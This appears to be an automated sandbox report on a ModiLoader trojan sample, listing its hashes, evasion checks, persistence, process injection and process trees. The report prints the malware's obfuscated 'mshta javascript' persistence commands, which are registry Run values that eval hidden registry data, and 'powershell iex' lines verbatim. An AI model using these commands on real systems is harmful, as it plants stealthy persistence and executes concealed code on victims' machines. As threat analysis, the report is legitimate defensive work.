Malware Analysis Report

2024-08-06 14:38

Sample ID 240523-nrv5zaef2v
Target 6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118
SHA256 7714f1c339a22c229e0615d32fe5f47825e479abc96eb23689a226208eb33411
Tags: modiloader evasion persistence trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 7714f1c339a22c229e0615d32fe5f47825e479abc96eb23689a226208eb33411

Threat Level: Known bad

The file 6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

Tags: modiloader evasion persistence trojan

Process spawned unexpected child process
ModiLoader, DBatLoader
Looks for VirtualBox drivers on disk
Checks for common network interception software
ModiLoader Second Stage
Looks for VirtualBox Guest Additions in registry
Adds policy Run key to start application
Looks for VMWare Tools registry key
Deletes itself
Checks BIOS information in registry
Checks computer location settings
Adds Run key to start application
Maps connected drives based on registry
Suspicious use of SetThreadContext
Drops file in System32 directory
Unsigned PE
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported: 2024-05-23 11:38

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-23 11:38
Reported: 2024-05-23 11:40
Platform: win7-20240221-en
Max time kernel: 150s
Max time network: 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage


Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:LXU3aQ3Z=\"Id1A73m\";Y5j=new%20ActiveXObject(\"WScript.Shell\");F6CE4DaPi=\"68AeAVTke\";k2uxu=Y5j.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\37bbe06315\\\\afdf89ec\");eurxGs75hV=\"uxp1\";eval(k2uxu);Vtf0Jzai3C=\"aXz\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:iHBc4qW7=\"pRqR\";c99V=new%20ActiveXObject(\"WScript.Shell\");HLRQ0Fi8fw=\"dF0\";kCFh8=c99V.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\37bbe06315\\\\afdf89ec\");zy11mmFP=\"altqS\";eval(kCFh8);wpGA90Bxu=\"WohCrf\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:M0bCqXPSX=\"dLxo30V\";qz5=new%20ActiveXObject(\"WScript.Shell\");GAkbt4ewR=\"L1sNr4\";Tur0B3=qz5.RegRead(\"HKCU\\\\software\\\\37bbe06315\\\\afdf89ec\");pe4CLIu=\"4\";eval(Tur0B3);M9TIrrI8=\"nH\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2908 wrote to memory of 2432 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2432 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2468 wrote to memory of 2396 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
  C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

C:\Windows\system32\mshta.exe
  "C:\Windows\system32\mshta.exe" javascript:ajKeMj82jz="Qp683ERT";u55P=new%20ActiveXObject("WScript.Shell");WTh5tCjPr="SZ5v";AvPu8=u55P.RegRead("HKLM\\software\\Wow6432Node\\A4ACHS\\vBuZqBdSsr");CSj6qUX="ZZELCd";eval(AvPu8);qBpNXrkZ3="BLYQg64SKq";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:dwqrn

C:\Windows\SysWOW64\regsvr32.exe
  regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe
  "C:\Windows\SysWOW64\regsvr32.exe"

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted: 2024-05-23 11:38
Reported: 2024-05-23 11:40
Platform: win10v2004-20240508-en
Max time kernel: 148s
Max time network: 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage


Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 1308 wrote to memory of 3620 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
  C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

C:\Windows\system32\mshta.exe
  "C:\Windows\system32\mshta.exe" javascript:tBxbe6rS="FNyVRH";gH4=new%20ActiveXObject("WScript.Shell");ct81TWZNhd="oktYhmiD";zpS93h=gH4.RegRead("HKLM\\software\\Wow6432Node\\994TReLaV\\v1xweq17ec");RUdr4xGH="Oy";eval(zpS93h);UwChz7WGV="6";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:waxpw

Network


Files


C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vkm3p2jd.fhd.ps1
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
